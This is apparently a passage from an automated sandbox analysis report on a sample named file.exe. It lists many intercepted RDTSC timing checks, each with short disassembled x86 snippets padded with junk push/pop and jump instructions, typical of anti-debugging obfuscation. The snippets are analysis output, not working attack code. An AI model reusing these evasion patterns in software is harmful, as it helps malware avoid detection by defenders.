          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE815 second address: ACE81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6B19184AB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE81F second address: ACE88A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6B18E88FEDh 0x00000011 nop 0x00000012 mov dword ptr [ebp+12472EC0h], esi 0x00000018 push 00000004h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F6B18E88FE8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov ecx, dword ptr [ebp+122D29C9h] 0x0000003a mov dword ptr [ebp+122D2175h], ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F6B18E88FEAh 0x00000048 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEC88 second address: ACEC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEDEE second address: ACEDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEDF2 second address: ACEE03 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEFC3 second address: ACF00C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jnc 00007F6B18E88FF6h 0x00000013 jnl 00007F6B18E88FE8h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jns 00007F6B18E88FE8h 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jo 00007F6B18E88FEEh 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF07F second address: ACF085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF085 second address: ACF089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF089 second address: ACF0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dword ptr [ebp+122D1DBBh], eax 0x0000000f lea eax, dword ptr [ebp+12484B98h] 0x00000015 mov edx, dword ptr [ebp+122D2B49h] 0x0000001b nop 0x0000001c jg 00007F6B19184AC0h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6B19184AC7h 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF0CF second address: ACF11E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B18E88FECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b lea eax, dword ptr [ebp+12484B54h] 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F6B18E88FE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push esi 0x0000002c sub dword ptr [ebp+122D1BE8h], edi 0x00000032 pop edx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jnl 00007F6B18E88FE6h 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF11E second address: ACF133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jc 00007F6B19184AB6h 0x00000014 pop ecx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF133 second address: AB1507 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a or dword ptr [ebp+122D18B9h], edx 0x00000010 mov esi, dword ptr [ebp+122D23BAh] 0x00000016 popad 0x00000017 call dword ptr [ebp+122D320Bh] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B089EE second address: B08A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B19184ABDh 0x00000009 ja 00007F6B19184AB6h 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08A06 second address: B08A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6B18E88FE6h 0x00000009 jmp 00007F6B18E88FF3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 js 00007F6B18E8900Eh 0x00000019 jmp 00007F6B18E88FF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6B18E88FEAh 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08E4B second address: B08E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F6B19184AC2h 0x0000000f jnc 00007F6B19184AB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08E6C second address: B08E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F6B18E88FE8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08E85 second address: B08E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08E8D second address: B08EA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08EA4 second address: B08EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08EAA second address: B08EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08EAE second address: B08EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09436 second address: B0943C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0943C second address: B09441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10785 second address: B1078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1078D second address: B10793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10BED second address: B10BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10309 second address: B1030E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1030E second address: B10323 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B18E88FF7h 0x00000008 jmp 00007F6B18E88FEBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10323 second address: B10341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F6B19184AC6h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10341 second address: B10363 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F6B18E88FF0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F6B18E88FF4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10363 second address: B10367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17028 second address: B17038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6B18E88FE6h 0x0000000a jc 00007F6B18E88FE6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B172DB second address: B172DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B172DF second address: B172FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6B18E88FF4h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17420 second address: B17438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6B19184AB6h 0x00000009 jnl 00007F6B19184AB6h 0x0000000f popad 0x00000010 jl 00007F6B19184AD0h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17438 second address: B1745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F6B18E88FE6h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1745C second address: B17470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6B19184ABEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17470 second address: B1747B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6B18E88FE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19D47 second address: B19D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B19184AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19D63 second address: B19D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19D69 second address: B19D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19D6E second address: B19D90 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6B18E88FEAh 0x00000008 pushad 0x00000009 ja 00007F6B18E88FE6h 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007F6B18E88FE6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19D90 second address: B19DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6B19184AC5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F6B19184AB6h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19DB4 second address: B19DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECA6 second address: B1ECE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F6B19184AE2h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EF51 second address: B1EF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FEBh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25291 second address: B25295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2587A second address: B2587E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2587E second address: B25884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25884 second address: B2589F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6B18E88FF2h 0x0000000c ja 00007F6B18E88FE6h 0x00000012 jne 00007F6B18E88FE6h 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEAD9 second address: ACEADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEADF second address: ACEAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEAE3 second address: ACEAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29A8F second address: B29A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29256 second address: B29262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6B19184AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29262 second address: B2926B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2926B second address: B29278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B293FB second address: B293FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F473 second address: B2F499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6B19184ABCh 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B19184AC1h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F499 second address: B2F49F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F739 second address: B2F77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F6B19184AD8h 0x0000000e jmp 00007F6B19184AC1h 0x00000013 jmp 00007F6B19184AC1h 0x00000018 jmp 00007F6B19184ABCh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F77B second address: B2F77F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30012 second address: B3001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6B19184AB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3001C second address: B30020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B308B7 second address: B308BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B308BB second address: B308D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B18E88FF6h 0x00000008 jmp 00007F6B18E88FF0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B308D9 second address: B308DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3116E second address: B31174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35379 second address: B3539F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B19184AC3h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F6B19184ABBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3539F second address: B353AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FEBh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35EAE second address: B35EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35EB2 second address: B35ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jl 00007F6B18E88FF8h 0x00000010 jc 00007F6B18E88FF2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B06 second address: B43B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6B19184AB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B10 second address: B43B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43EB0 second address: B43EB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43EB8 second address: B43ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43ED1 second address: B43ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43ED5 second address: B43EE4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6B18E88FE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44084 second address: B44089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44089 second address: B440A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B18E88FEAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F6B18E88FFAh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B440A1 second address: B440A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A69 second address: B44AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F6B18E88FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6B18E88FEFh 0x00000011 pushad 0x00000012 jmp 00007F6B18E88FF4h 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c popad 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jnl 00007F6B18E88FE6h 0x00000026 jc 00007F6B18E88FE6h 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44AAE second address: B44AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B968 second address: B4B96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B96E second address: B4B972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56377 second address: B5637D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5637D second address: B56381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56381 second address: B56387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8C2 second address: B5A8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8C6 second address: B5A8CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2B6 second address: B5A2BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2BC second address: B5A2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2C2 second address: B5A2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2C6 second address: B5A2CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2CA second address: B5A2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
